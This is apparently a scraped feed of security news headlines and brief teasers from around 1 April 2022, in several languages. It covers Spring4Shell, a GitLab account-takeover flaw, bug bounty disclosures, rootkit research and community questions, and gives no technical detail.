    3月30日,国家信息安全漏洞共享平台(CNVD)收录了Spring框架远程命令执行漏洞(CNVD-2022-23942)。
  • Open

    AD Series | DC Sync Attacks
    DCSync Attack is a type of “credential dumping” attack that makes use of commands present in Microsoft Directory Replication Service… Continue reading on Medium »
    Prologue to Red Hat hackers in Cyber Security
    What are Red hat hacker or Red Team? Continue reading on Medium »
    HackTheBox Delivery Writeup
    Hello, i want share how i solve Hackthebox Delivery box. this box is fun and easy Continue reading on MII Cyber Security Consulting Services »
    HackTheBox Ready Writeup
    Hello, i want to share how i solve HackTheBox Ready machine. this box is kind need more research to analyze and fun. Continue reading on MII Cyber Security Consulting Services »
    HackTheBox — ScriptKiddie Writeup
    Langkah pertama yang harus dilakukan adalah dengan melakukan nmap untuk mengetahui port yang terbuka, karena IP address 10.10.10.226 tidak… Continue reading on MII Cyber Security Consulting Services »
    HackTheBox — Passage Writeup
    IP : 10.10.10.26 Continue reading on MII Cyber Security Consulting Services »
  • Open

    CVE 2022-22965 (Spring4Shell) Vulnerability
    On March 29, 2022, a security researcher with the handle p1n93r disclosed a Spring Framework remote code execution (RCE) vulnerability, which was archived by vx-underground. This vulnerability, known as Spring4Shell, affects applications that use JDK v9 or above that run Apache Tomcat as the Servlet Container in a WAR package and use dependencies of the... The post CVE 2022-22965 (Spring4Shell) Vulnerability appeared first on TrustedSec.
  • Open

    SecWiki News 2022-04-01 Review
    Chrome Zero-Day from North Korea by ourren 【Rootkit 系列研究】Windows 平台的高隐匿、高持久化威胁 by ourren 基于 OpenAFS 文件系统的反射攻击深度分析 by ourren 关于如何更好地呈现红蓝对抗价值的思考 by ourren 使用DNS Tunnel技术的Linux后门B1txor20正在通过Log4j漏洞传播 by ourren 商业数字证书签发和使用情况简介 by ourren Spring Cloud Function SpEL表达式注入 by ourren CodeQl 从0到0.1 by ourren codeql挖掘java二次反序列化 by ourren K8s安全入门学习扫盲贴 by ourren Malbox: 恶意软件容器靶机 by ourren 《深入理解CodeQL》Finding vulnerabilities with CodeQL. by ourren 使用 CodeQL 分析 AOSP by ourren Java内存马分析集合 by ourren CVE-2021-29454—Smarty模板注入分析复现 by ourren 机器学习系统:设计和实现 by ourren 混合办公(Hybrid Work)安全的“三年”技术落地趋势推演 by ourren LAPSUS$安全攻击的胡乱分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-01 Review
    Chrome Zero-Day from North Korea by ourren 【Rootkit 系列研究】Windows 平台的高隐匿、高持久化威胁 by ourren 基于 OpenAFS 文件系统的反射攻击深度分析 by ourren 关于如何更好地呈现红蓝对抗价值的思考 by ourren 使用DNS Tunnel技术的Linux后门B1txor20正在通过Log4j漏洞传播 by ourren 商业数字证书签发和使用情况简介 by ourren Spring Cloud Function SpEL表达式注入 by ourren CodeQl 从0到0.1 by ourren codeql挖掘java二次反序列化 by ourren K8s安全入门学习扫盲贴 by ourren Malbox: 恶意软件容器靶机 by ourren 《深入理解CodeQL》Finding vulnerabilities with CodeQL. by ourren 使用 CodeQL 分析 AOSP by ourren Java内存马分析集合 by ourren CVE-2021-29454—Smarty模板注入分析复现 by ourren 机器学习系统:设计和实现 by ourren 混合办公(Hybrid Work)安全的“三年”技术落地趋势推演 by ourren LAPSUS$安全攻击的胡乱分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    ZAP Structural Modifier
    저는 취약점을 찾을 때 중요한 3가지를 뽑으라고 한다면 아마도 기술에 대한 이해, 대상에 대한 이해, 그리고 센스를 택할 것 같습니다. 물론 이외에도 중요한 요소들은 정말 많겠지만 이 3가지는 일할 때 가장 많이 느끼는 부분이였어요. 갑자기 이런 이야기를 하는건 오늘 주제가 대상에 대한 이해와 연관이 깊기 때문입니다. ZAP에 관련된 부분이지만, Burp 사용자도 충분히 영감을 얻어가실 수 있을거라 생각이 드네요. ZAP Structural Modifier 입니다. 그럼 시작하죠 🚀 Structural Modifier ZAP은 Site Tree의 구조를 수정할 수 있는 Structural Modifier 란 기능을 지원하고 있습니다.
  • Open

    Critical Gitlab vulnerability let attackers take over accounts
    Article URL: https://www.bleepingcomputer.com/news/security/critical-gitlab-vulnerability-lets-attackers-take-over-accounts/ Comments URL: https://news.ycombinator.com/item?id=30878924 Points: 197 # Comments: 36
    Report a security vulnerability as an ethical hacker
    Article URL: https://opencirt.com/hacking/report-security-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30877585 Points: 1 # Comments: 1
  • Open

    Hunting for Malicious Binaries and Backdoors in the Running Containers
    submitted by /u/tbhaxor [link] [comments]
  • Open

    is PSP to be very worried?
    there are a lot of suspects about AMD putting backdoors on their chips and its concerning a lot of people. they are a security problem and cant be mitigated. my question is for people with actual knowledge: i want more information about the risks. i know it has full write/read access, it can see everything on the pc and it can be "remotely" manipulated. note on remotely, it can mean many things. ​ does it collect any data in a telemetry fashion or was it reported to ping weird IPs? does remote control need to be manually activated, or its permanently active by default? could it have any way to not depend on internet like sending info via radio? ​ And essentially: its suspected to be made for targeted attacks or global surveillance? it's essentially a backdoor on every modern computer so i cant be calm about it. this could be used for literally anything but few people knows what. this is why i ask here: to see if someone with knowledge can give info about this threat. i am extremely cautious about privacy, which overlaps with security, and i thought this can be a direct compromise. one of my highest goals is reducing the amount of data sent to corps. my threat model focuses more on data-hungry corps and services which want to know every detail about you and potentially have direct impact over you. i do nothing illegal and live in a democratic EU country (poland), and i am no one important enough to be individually targeted. so i asked because i dont really feel much a risk being finger pointed by agencies, but i am about mass surveillance methods that affect every computer on the world. PSP knowing absolutely all my pc activity is a no-no. submitted by /u/gre4tynhrj [link] [comments]
    Non-DNS or Non-Compliant DNS traffic on DNS port in UniFi UDM IPS
    I have been seeing this error "ET DNS Non-DNS or Non-Compliant DNS traffic on DNS port Reserved Bit Set" almost twice or three times a day. source: 192.168.107.92 : 49013 (port changes when alert is triggered) destination: 1.1.1.1 : 53 or sometimes 8.8.8.8 : 53 (my upstream dns in pihole) I have been trying my best to figure this one out but with no luck, could anyone please help or guide me on how to investigate this alert? some details: old_phone 192.168.107.79 new_phone 192.168.107.204 pihole_dns 192.168.107.92 I have started seeing this error a while back after enabling IPS, every time the source is my pihole which is used as a DNS for all network devices, when I try to match the traffic in pihole with the time the alert is triggered in UDM I always saw the same device "old_pho…
    Volunteer pentest/bug hunt program
    Hi! I am currently looking into possibilities to set up a volunteer pentest agreement or program. I am volunteering for a NGO which helps refugees and they like to get a pentest for their website. At first I thought thats a no brainer - just set up a profile at a bug bounty site. But thats not so easy, e.g. bugcrowd dows not allow complete private programs and minimum 20$ rewards. We would like to keep legal costs to a minimum and wanted to avoid hiring a attorney to set up contracts, if there are other possibilies. We already have volunteering pentester, they just wait for the legal green light to start. Any recommendations on that? submitted by /u/iiskierka [link] [comments]
    Spring4Shell Detection
    https://github.com/west-wind/Spring4Shell-Detection ​ If any other ways to detect, please comment and let everybody know. submitted by /u/la_farfalla_ [link] [comments]
    Vulnerability Research or SOC?
    I'm about to graduate with my degree in Computer Science, with very minimal experience in cybersecurity. Right now it seems as though I may be given to opportunity to work either as a vulnerability researcher or as a SOC analyst, both junior roles where my respective seniors would help me figure things out as I transitioned into these roles. Which would you recommend as a first-experience career choice to start off with in cybersecurity? submitted by /u/justaguybye [link] [comments]
  • Open

    Resources Search Engine for Infosec based on Ippsec.rocks
    submitted by /u/sarthaksaini [link] [comments]
    Gaining code execution on the backend of the PEAR package manager
    submitted by /u/monoimpact [link] [comments]
    How Go Mitigates Supply Chain Attacks
    submitted by /u/e-san55 [link] [comments]
    SpringShell Zero-Day Vulnerability: All You Need To Know
    submitted by /u/SRMish3 [link] [comments]
  • Open

    Passive-aggressive scan checks
    Here at PortSwigger, our goal is to enable the world to secure the web. Our scanner sits at the core of this value - quickly surfacing issues and vulnerabilities that may be present in a web applicati
  • Open

    Passive-aggressive scan checks
    Here at PortSwigger, our goal is to enable the world to secure the web. Our scanner sits at the core of this value - quickly surfacing issues and vulnerabilities that may be present in a web applicati
  • Open

    Finding bugs that doesn’t exists
    No content preview
  • Open

    Finding bugs that doesn’t exists
    No content preview
  • Open

    Finding bugs that doesn’t exists
    No content preview
  • Open

    Spring has sprung: breaking down CVE-2022-22963/CVE-2022-22965)
    Article URL: https://www.fastly.com/blog/spring-has-sprung-breaking-down-cve-2022-22963-and-spring4shell-cve-2022 Comments URL: https://news.ycombinator.com/item?id=30874271 Points: 1 # Comments: 0

  • Open

    GitLab Critical Security Release: 14.9.2, 14.8.5, and 14.7.7
    submitted by /u/0xmilan [link] [comments]
    Critical Vulnerability in Spring Core: CVE-2022-22965 a.k.a. Spring4Shell
    submitted by /u/MiguelHzBz [link] [comments]
    IDA plugin for finding constants used in conditional statements
    submitted by /u/Martypx00 [link] [comments]
    Conti-nuation: methods and techniques observed in operations post the leaks
    submitted by /u/digicat [link] [comments]
    GitHub Cache Poisoning
    submitted by /u/BarakScribe [link] [comments]
    SpringShell Detector - searches compiled code (JAR/WAR binaries) for potentially vulnerable web apps
    submitted by /u/SRMish3 [link] [comments]
    Pwning 3CX Phone Management Backends from the Internet
    submitted by /u/EnableSecurity [link] [comments]
    Spring4Shell 0-day writeup and guidance
    submitted by /u/CraZyBob [link] [comments]
  • Open

    CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell)
    CVE-2022-22965, aka SpringShell, is a remote code execution vulnerability in the Spring Framework. We provide a root cause analysis and mitigations. The post CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) appeared first on Unit42.
  • Open

    Path of least Resistance
    Hello! I am a student finishing my masters in computer engineering and I also work as a consultant, doing DevOps and cloud infrastructure management. I am really interested in Cyber and have focused my masters around security and Networking. I have also done some free online courses on Cyber security. I am trying to pitch to my superiors the idea of providing cyber security services to your clients, but science we do not have a cyber team, I was thinking which area of cyber would be the one that would be the "easiest" to start offering. submitted by /u/Ap0k4lips3 [link] [comments]
    What do you guys think about SSL ?
    Do you think letsencrypt auto 3 month renewal ( with certbot) is worth it or do I buy comodo or digital cert ? I am starting my own cybersecurity company as a contractor LLC, and will be building a website also using an email based on that email, can i use the SSL certificate for both ? submitted by /u/Morpheus_mmg [link] [comments]
    PoC available for CVE's
    Is there someplace where CVE's have a poc available status? I looked at exploitdb but they don't have anything for the spring vuln and I'm wanting something that updates faster than that. edit: I look at https://cvetrends.com/ and when a new cve bubbles to the top. I would like to know if a poc has been released for it. submitted by /u/rogueit [link] [comments]
    USB WiFi with external antenna attachment, usable on Linux?
    What are decent USB WiFi devices that allow attaching an external antenna, that can also run in monitor mode on Linux? I'd like to try the aircrack-ng attacks on my home network, which includes a number of Wireless Access Points. I've got a TP-LINK TL-WN722N, but I think it isn't capable of doing the 5Mhz channels, which I'd like to try out. I don't have any Windows machines. submitted by /u/bediger4000 [link] [comments]
    Deciding between Varonis and Digital Guardian
    I'm in an org with a decent budget for tools yet am the only infosec analyst on staff so limited time to spend on them. We currently have both Varonis and Digital Guardian deployed though not fully leveraging either of them, and from a value perspective it may not make sense to renew them both as it currently stands. In my limited experience with them I see a lot of overlap with some unique characteristics for each, like the DG agent on endpoints being able to take a block action on data, versus some fairly nice behavior analysis through Varonis on user and group access with recommendations. Anyone familiar with either or both of these products have insights on how well they compliment each other or if one can mostly supplant the other? submitted by /u/EnterNam0 [link] [comments]
    Internet facing host(hypervisor) to secure question - setup
    I thinked about a setup to maximize a physical host usage by running Proxmox(hypervisor) on an internet facing machine. The hypervisor os would have 2 NICs: eth0 configured with an internal IP v4(for management purposes) and eth1(internet facing adapter) will have no ip(v4 or v6) configured on the hypervisor os(present only to be attached to the router VM). eth1 will be attached only to the router VM(pfsense) which will also have another vNIC bridged to the internal network for obvious reasons. What issues/risks do you think this setup poses and how to secure this? This obviously will be only a home lab setup not for a business etc Thank you! submitted by /u/j0hnnyrico [link] [comments]
    I think my neighbor is spamming my wifi router with deauth packets
    Title. Ive been getting kicked off my wifi at night, for 3 days straight, how can i confirm this so i can go to the police? I have a 802.xx device with aircrackng. submitted by /u/Far-Veterinarian9464 [link] [comments]
    Do I need an antivirus with iOS ?
    Most of the AV’s doesn’t offer what they offer on Android as iOS has already built in security features that doesn’t let AV’s function essentially. submitted by /u/jigjagascrp4 [link] [comments]
    Which should I choose ? @gmail.com - @outlook.com - @icloud.com
    Not talking about apps just domains (as I’m gonna use Apple Mail anyway), which one should I choose when creating an email address ? submitted by /u/jigjagascrp4 [link] [comments]
  • Open

    【安全通报】Spring Framework 远程命令执行漏洞(CVE-2022...
    近日,Spring 官方 GitHub issue中提到了关于 Spring Core 的远程命令执行漏洞,该漏洞广泛存在于Spring 框...
  • Open

    【安全通报】Spring Framework 远程命令执行漏洞(CVE-2022...
    近日,Spring 官方 GitHub issue中提到了关于 Spring Core 的远程命令执行漏洞,该漏洞广泛存在于Spring 框...
  • Open

    Information Leakage via TikTok Ads Web Cache Deception
    TikTok disclosed a bug submitted by arifmkhls: https://hackerone.com/reports/1484468 - Bounty: $200
    Stored XSS in merge request creation page through payload in approval rule name
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1342009 - Bounty: $3000
    IDOR: leak buyer info & Publish/Hide foreign comments
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1410498 - Bounty: $1250
    Stored XSS in Question edit from product name
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1416672 - Bounty: $500
    stored XSS on AliExpress Review Importer/Products when delete product
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1425882 - Bounty: $500
    Stored XSS in Question edit for product name (bypass #1416672)
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1428207 - Bounty: $500
  • Open

    Gitlab – Static passwords set during OmniAuth-based registration (CVE-2022-1162)
    Article URL: https://about.gitlab.com/releases/2022/03/31/critical-security-release-gitlab-14-9-2-released/ Comments URL: https://news.ycombinator.com/item?id=30872415 Points: 8 # Comments: 0
    A Technical Analysis of How Spring4Shell (CVE-2022-22965) Works
    Article URL: https://www.extrahop.com/company/blog/2022/a-technical-analysis-of-how-spring4shell-works/ Comments URL: https://news.ycombinator.com/item?id=30870453 Points: 12 # Comments: 6
    Rust Open Source CVE Search Engine
    Article URL: https://github.com/Exein-io/kepler Comments URL: https://news.ycombinator.com/item?id=30866901 Points: 1 # Comments: 0
    Future-Proofing SaltStack ( CVE 2022-22934 2022-22935 2022-22936 )
    Article URL: https://blog.cloudflare.com/future-proofing-saltstack/ Comments URL: https://news.ycombinator.com/item?id=30866784 Points: 3 # Comments: 0
  • Open

    Cross-Site Scripting (XSS) via image rendering application
    Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to teach you how to test an image rendering application and be… Continue reading on Medium »
    80+ million Digilocker user’s phone numbers exposed [Fixed]
    This is a story about my last finding at digilocker. In bug bounty we call these type issue as ‘low hanging fruits’. I already contribute… Continue reading on Medium »
    Hats Protocol Economics — Part I
    Long-term sustainability and token utility Continue reading on Medium »
    CloudSek EWYL 2022 CTF
    Solving a Harry Potter Themed CTF Continue reading on InfoSec Write-ups »
  • Open

    Website OSINT
    No content preview
    Detecting malware packages in GitHub Actions
    No content preview
    CloudSek EWYL 2022 CTF
    No content preview
  • Open

    Website OSINT
    No content preview
    Detecting malware packages in GitHub Actions
    No content preview
    CloudSek EWYL 2022 CTF
    No content preview
  • Open

    Website OSINT
    No content preview
    Detecting malware packages in GitHub Actions
    No content preview
    CloudSek EWYL 2022 CTF
    No content preview
  • Open

    Spring Remote Code Execution Vulnerability
    Article URL: https://talktotheduck.dev/spring-remote-code-execution-vulnerability Comments URL: https://news.ycombinator.com/item?id=30871886 Points: 12 # Comments: 1
    Vulnerability in the Combined Charging System for Electric Vehicles
    Article URL: https://www.brokenwire.fail/ Comments URL: https://news.ycombinator.com/item?id=30867098 Points: 2 # Comments: 0
    New Spring4Shell Zero-Day Vulnerability What it is and how to be prepared
    Article URL: https://www.contrastsecurity.com/security-influencers/new-spring4shell-vulnerability-confirmed-what-it-is-and-how-to-be-prepared Comments URL: https://news.ycombinator.com/item?id=30865001 Points: 2 # Comments: 0
  • Open

    Exploring a New Class of Kernel Exploit Primitive
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    XSS Vulnerability Part 1
    Greetings, in this article I want to describe the XSS vulnerability in detail. Continue reading on Medium »
    REFLECTED XSS IN DEPED.GOV.PH BY NEUCHI
    |Hello Infosec Community Continue reading on Medium »
  • Open

    Website OSINT
    In this article, I learn how to use Open Source Intelligence (OSINT) techniques and tools to gather information about several websites and… Continue reading on InfoSec Write-ups »
    How to clean a smartphone that fell into the wrong hands?
    Let’s talk about the safety of your smartphone in cases where it has fallen or is about to fall into the wrong hands. Firstly, the regular… Continue reading on Medium »
    Ukraine — Point de situation au 1er avil
    Les dernières 24h Continue reading on Medium »
    TryHackMe: Content Discovery Writeup
    This room aims to teach the various ways of discovering hidden or private content on a webserver that could lead to new vulnerabilities… Continue reading on Medium »
    War in Ukraine / March 30
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    9 reliable and free OSINT tools
    Maltego (https://www.maltego.com/) is one of the best data visualization and investigation automation systems in the world. Used even by… Continue reading on Medium »
    Identification of cryptocurrency wallets
    Let’s talk about the identification of cryptocurrency wallets. Continue reading on Medium »
    Deanonymization of a Skype profile
    Today I will tell you about the deanonymization of a Skype profile. It is appropriate to start researching a Skype profile by trying to… Continue reading on Medium »
  • Open

    SEC Filings for Nova Scotia Bank
    Hi All. Interesting one, may or may not been posted before. Probably publicly avail. https://www.sec.gov/Archives/edgar/data/9631/000114036122011592 submitted by /u/Stan464 [link] [comments]
  • Open

    Chrome 101: Federated Credential Management Origin Trial, Media Capabilities for WebRTC, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 101 is beta as of March 31, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Reduce User Agent String Information Chrome is trying to reduce the amount of information the user agent string exposes in HTTP requests as well as in navigator.userAgent, navigator.appVersion, and navigator.platform. We're doing this to prevent the user agent string from being used for passive user fingerprinting. To join the origin trial, see its entry on Chrome Origin Trials. See the end of this article for…
    What to Expect from Privacy Sandbox Testing
    We’re excited to share that Chrome is starting the next stage of testing for the Privacy Sandbox ads relevance and measurement proposals. Starting today, developers can begin testing globally the Topics, FLEDGE, and Attribution Reporting APIs in the Canary version of Chrome. We’ll progress to a limited number of Chrome Beta users as soon as possible. Once things are working smoothly in Beta, we’ll make API testing available in the stable version of Chrome to expand testing to more Chrome users. We recognize that developers will need some time to use the APIs, validate the data flows, and measure performance. We are looking forward to companies providing feedback as they move through the different testing phases, which will allow us to continually improve the APIs. Once we’re confident that…
  • Open

    SecWiki News 2022-03-31 Review
    CodeQL 踩坑指南 - Java by ourren CodeQL 提升篇之路由收集 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-31 Review
    CodeQL 踩坑指南 - Java by ourren CodeQL 提升篇之路由收集 by ourren 更多最新文章,请访问SecWiki
  • Open

    Ajax Spidering 시 브라우저 엔진 별 성능 비교 🏁
    ZAP의 AjaxSpider는 headless browser를 통해서 직접 브라우징하며 Spidering 하는 기능입니다. 기본적으로는 Firefox가 설정되어 있지만, 개인의 취향에 따라 Chrome, PhantomJS 등 여러가지 browser(headless or common)를 사용할 수 있습니다. 갑자기 궁금해졌습니다. 과연 누가 제일 빠르고 많이 잡아올까? 그래서 비교해보기로 마음먹었죠. TLDR firefox: Found 675 URLs chrome: Found 382 URLs phantomjs: Found 340 URLs How to test 방법은 간단합니다. Security Crawl Maze 를 대상으로 AjaxSpidering을 진행하며 이 때 수집된 URL의 수를 비교합니다.
    Cullinan
    Cullinan is a wiki for hacking/security/bugbounty Cullinan is an wiki and cheatsheet page for hacking/security/bugbounty. It covers definitions of common vulnerabilities, testing methods, bypass techniques, and countermeasures, as well as tools and tutorials. If you have a good idea or additional comments about the page, please send me(@hahwul) a tweet. 컬리넌은 해킹/보안/버그바운티 등 전반적인 AppSec에 대한 위키 및 치트시트입니다. 보편적인 취약점에 대한 정의, 테스팅 방법, 우회 기법 및 대응방안에 대해 다루며, 도구의 사용 방법이나 튜토리얼 또한 포함합니다.
  • Open

    HomeGrown Red Team: Let’s Evade AV And Run Lazagne
    What is Lazagne? Continue reading on Medium »
    SnapAttack Launches Community Edition to Drive Collaboration Across Cybersecurity Community
    Company launches free of charge platform providing access to a vast library of attack and detection content, including the latest threats… Continue reading on SnapAttack »
  • Open

    Collecting artefacts from a windows/Linux system using SSH remote connection
    I want to know how I can use SSH to connect remotely to a windows or Linux system and access the artefacts(event logs, register key, files, timestamps) of the system and save them to the system I'm connection from. submitted by /u/EzraSC [link] [comments]
  • Open

    7月1日起施行,《重庆市数据条例》正式发布
    《条例》分为总则、数据处理和安全、数据资源、数据要素市场、发展应用、区域协同、法律责任等8章,60条。
    从0到1完全掌握目录遍历漏洞
    目录遍历漏洞是由于网站存在配置缺陷,导致网站目录可以被任意浏览,这会导致网站很多隐私文件与目录泄露。
    FreeBuf甲方群话题讨论 | 聊聊疫情期间企业网络安全
    远程使用公司派发的装有相关安全工具的电脑,能够起到多大的安全防护作用?企业的应该如何构建身份验证机制来确保安全?
    从0到1完全掌握 SQL 注入
    <h1 data-nodeid="4292" class="">从0到1完全掌握 SQL 注入</h1><ul data-node
    脑机接口技术调研报告
    脑机接口是指在大脑与外部设备之间创建的直接连接,实现脑与外部设备之间的信息交换。其工作流程包括脑电信号的采集和获取、信号处理、信号的输出和执行,最终再将信号反馈给大脑。
    CISA和DoE联合警告,小心针对联网UPS设备的网络攻击
    CISA和DoE联合发布了关于减轻针对联网的不间断电源 (UPS) 设备的攻击指南,并向企业发出了相应的告警。
    Lapsus$勒索团伙声称攻击IT巨头Globant
    近日,勒索团伙Lapsus$声称其侵入了IT巨头Globant公司,并在网络上泄露了大约70GB的被盗数据。
    监控软件公司 FinFisher 宣布破产
    总部位于慕尼黑的间谍软件公司FinFisher已于上个月宣布破产,有关部门正对其业务交易进行调查。
    纽约82万名学生的个人数据被曝光
    近期,纽约一个广泛使用的在线评分和考勤系统遭到黑客攻击,这可能是美国历史上学生个人数据最大的一次曝光。犯罪分子于1月闯入Illuminate Education IT系统,并获得了约820,000名现任和前任纽约市公立学校学生个人数据的数据库的访问权限。Illuminate Education是一家位于加利福尼亚州的纳税人资助的软件公司。该公司创建了流行的IO Classroom、Skedula和
    部分本田车型存在漏洞,黑客可远程启动车辆
    黑客可通过本田漏洞重放攻击,解锁和启动车辆 。
    ​与智者同行,FreeBuf咨询TTSP智库专家公开招募火热开启
    即日起,TTSP安全智库公开招募火热开启,欢迎各位有心共同交流、学习,共同推动网络安全产业发展的网安人报名参加。
  • Open

    【Rootkit系列研究】Windows平台高隐匿、高持久化威胁(二)
    作者:深信服千里目安全实验室 相关阅读: 1、【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑 2、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁 3、【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁 4、【Rootkit 系列研究】Rootkit检测技术发展现状 5、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁(二) 序言...
    【Rootkit 系列研究】Rootkit 检测技术发展现状
    作者:深信服千里目安全实验室 相关阅读: 1、【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑 2、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁 3、【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁 4、【Rootkit 系列研究】Rootkit检测技术发展现状 5、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁(二) 摘要...
    【Rootkit 系列研究】Linux 平台的高隐匿、高持久化威胁
    作者:深信服千里目安全实验室 相关阅读: 1、【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑 2、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁 3、【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁 4、【Rootkit 系列研究】Rootkit检测技术发展现状 5、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁(二) 序言...
    针对企业用户的恶意 Word 文件
    译者:知道创宇404实验室翻译组 原文链接:https://asec.ahnlab.com/en/33186/ ASEC 研究团队发现一个 Word 文件,它似乎是针对企业用户的。该文件包含一个图像,提示用户启动类似恶意文件一样的宏。为了欺骗用户认为这是一个无害的文件,当宏运行时,它显示了与提高谷歌帐户安全性有关的信息。最终,它会下载额外的恶意软件文件并泄露用户信息。 当文件运行时,它会显示...
    【Rootkit 系列研究】Windows 平台的高隐匿、高持久化威胁
    作者:深信服千里目安全实验室 相关阅读: 1、【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑 2、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁 3、【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁 4、【Rootkit 系列研究】Rootkit检测技术发展现状 5、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁(二) 从西...
  • Open

    【Rootkit系列研究】Windows平台高隐匿、高持久化威胁(二)
    作者:深信服千里目安全实验室 相关阅读: 1、【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑 2、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁 3、【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁 4、【Rootkit 系列研究】Rootkit检测技术发展现状 5、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁(二) 序言...
    【Rootkit 系列研究】Rootkit 检测技术发展现状
    作者:深信服千里目安全实验室 相关阅读: 1、【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑 2、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁 3、【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁 4、【Rootkit 系列研究】Rootkit检测技术发展现状 5、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁(二) 摘要...
    【Rootkit 系列研究】Linux 平台的高隐匿、高持久化威胁
    作者:深信服千里目安全实验室 相关阅读: 1、【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑 2、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁 3、【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁 4、【Rootkit 系列研究】Rootkit检测技术发展现状 5、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁(二) 序言...
    针对企业用户的恶意 Word 文件
    译者:知道创宇404实验室翻译组 原文链接:https://asec.ahnlab.com/en/33186/ ASEC 研究团队发现一个 Word 文件,它似乎是针对企业用户的。该文件包含一个图像,提示用户启动类似恶意文件一样的宏。为了欺骗用户认为这是一个无害的文件,当宏运行时,它显示了与提高谷歌帐户安全性有关的信息。最终,它会下载额外的恶意软件文件并泄露用户信息。 当文件运行时,它会显示...
    【Rootkit 系列研究】Windows 平台的高隐匿、高持久化威胁
    作者:深信服千里目安全实验室 相关阅读: 1、【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑 2、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁 3、【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁 4、【Rootkit 系列研究】Rootkit检测技术发展现状 5、【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁(二) 从西...
  • Open

    Effective Seed Scheduling for Fuzzing with Graph Centrality Analysis(S&P22)
    We use graph centrality scores to build a generic seed scheduler for LibFuzzer, AFL and concolic execution engine in QSYM. Check our paper at https://arxiv.org/abs/2203.12064. Our code and replication package are available at https://github.com/Dongdongshe/K-Scheduler. Comments URL: https://news.ycombinator.com/item?id=30863270 Points: 1 # Comments: 0
  • Open

    SpringShell: Spring Core RCE 0-day Vulnerability
    submitted by /u/Gorkha56 [link] [comments]

  • Open

    lunasec/2022-03-30-spring-core-rce
    submitted by /u/hackerboy69 [link] [comments]
    Spring Core on JDK9+ is vulnerable to remote code execution
    submitted by /u/ScottContini [link] [comments]
    Spring4Shell: Security Analysis of the latest Java RCE '0-day' vulnerabilities
    submitted by /u/freeqaz [link] [comments]
    Betabot in the Rearview Mirror
    submitted by /u/krabsonsecurity [link] [comments]
    Top 3 Stealer Malware Activity Research
    submitted by /u/mstfknn [link] [comments]
    [OC] Data Exfiltration using RedDrop - A Python Webserver for file and data exfiltration which automatically detects, decodes, decrypts, and transforms data.
    submitted by /u/cyberbutler [link] [comments]
    Threat Alert: First Python Ransomware Attack Targeting Jupyter Notebooks
    submitted by /u/esdaniel- [link] [comments]
    A few vulnerabilities discovered in Wyze Cam (CVE-2019-9564, CVE-2019-12266)
    submitted by /u/jaymzu [link] [comments]
    Decrypting your own HTTPS traffic with Wireshark
    submitted by /u/Quantum_Rage [link] [comments]
    Cisco Nexus Dashboard Fabric Controller unauth web-to-root shell
    submitted by /u/ChoiceGrapefruit0 [link] [comments]
    Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)
    submitted by /u/Gallus [link] [comments]
    Spring Cloud Function SPEL Expression Injection Vulnerability Alert
    submitted by /u/Gallus [link] [comments]
  • Open

    EDRs & Shellcode Loaders
    In this post I have covered the basics of how EDR products work and also some ways to get around them (some source code included). Continue reading on Medium »
    Unsafe content loading [Electron JS]
    Phishing in misconfigured Electron apps Continue reading on Medium »
  • Open

    New Wave of AnonymousFox Cron Jobs
    Recently our Remediation and Research teams have noticed a new wave of malicious cron jobs associated with the notorious AnonymousFox malware. The cron jobs are purpose-built to reinfect the victim websites and make removal of the infection more cumbersome and time-consuming. In this post we’ll investigate one of these malicious cron jobs, describe what it does and how you can recognise and remove them on your website. If you’re currently dealing with such a hack you can check out our extensive AnonymousFox Hack Guide here for help with removing the infection from your environment. Continue reading New Wave of AnonymousFox Cron Jobs at Sucuri Blog.
  • Open

